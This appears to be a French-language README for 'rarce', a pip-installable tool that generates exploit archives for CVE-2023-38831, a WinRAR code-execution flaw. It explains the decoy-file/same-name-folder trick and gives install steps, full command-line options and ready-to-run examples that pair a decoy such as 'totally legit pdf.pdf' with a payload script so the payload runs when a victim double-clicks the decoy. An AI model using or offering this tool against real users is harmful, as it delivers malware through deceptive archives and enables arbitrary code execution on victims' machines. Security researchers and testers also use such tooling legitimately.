
Un outil facile à installer et à utiliser pour générer des payloads d'exploitation pour CVE-2023-38831, une RCE WinRAR avant les versions 6.23
Il s'agit d'un générateur d'exploit facile à installer et à utiliser, polyvalent, pour CVE-2023-38831, une vulnérabilité qui affecte WinRAR versions antérieures à 6.23.
RARLabs WinRAR avant la version 6.23 permet à des attaquants d'exécuter du code arbitraire lorsqu'un utilisateur tente de visualiser un fichier inoffensif dans une archive ZIP. Le problème survient car une archive ZIP peut contenir un fichier inoffensif (comme un fichier .JPG classique) ainsi qu'un dossier portant le même nom que ce fichier, et le contenu du dossier (qui peut inclure du contenu exécutable) est traité lors d'une tentative d'accès uniquement au fichier inoffensif. Cette vulnérabilité a été exploitée dans la nature entre avril et août 2023.

Vous pouvez installer l'outil facilement via pip.
pip install rarce
Ou, vous pouvez l'utiliser à partir du code source.
git clone https://github.com/ignis-sec/CVE-2023-38831-RaRCE
cd CVE-2023-38831-RaRCE
python3 setup.py install
usage: rarce [-h] [-v] [-i] [-dt] [-pt PRESERVE_TEMP] bait switch output
Générateur d'exploit pour CVE-2023-38831
arguments positionnels:
bait Chemin vers le fichier leurre à ajouter dans l'archive.
switch Chemin vers la charge utile (payload) qui remplacera le fichier leurre lors du double-clic.
output Chemin vers le fichier de sortie.
arguments optionnels:
-h, --help affiche ce message d'aide et quitte
-v, --verbose Sortie détaillée.
-i, --ignore-path-check
Ignorer la vérification de validité du chemin. Si cette option est donnée, rarce peut écraser des fichiers existants dans le paramètre de sortie, et peut créer les dossiers manquants pour le chemin de sortie.
-dt, --dont-use-tempdir
Empêche l'outil de créer un répertoire temporaire lors de la création de l'exploit. À la place, crée les dossiers intermédiaires dans le répertoire de travail actuel.
-pt PRESERVE_TEMP, --preserve-temp PRESERVE_TEMP
Préserve le répertoire temporaire après la création de l'exploit. Sans effet si -dt ou --dont-use-tempdir n'est pas spécifié.
Après installation via pip ou setup.py, vous pouvez utiliser cet outil depuis la ligne de commande. La commande suivante créera le fichier d'exploit pour vous. Lorsqu'un utilisateur double-clique sur le fichier leurre, le script ou l'exécutable de la charge utile s'exécutera à la place.
$ rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"
Vous pouvez également l'utiliser en tant que module exécutable.
python -m rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"
Vous pouvez aussi l'utiliser dans votre code existant.
from rarce import exploit
exploit("totally legit pdf.pdf", "payload.cmd", "exploit.rar")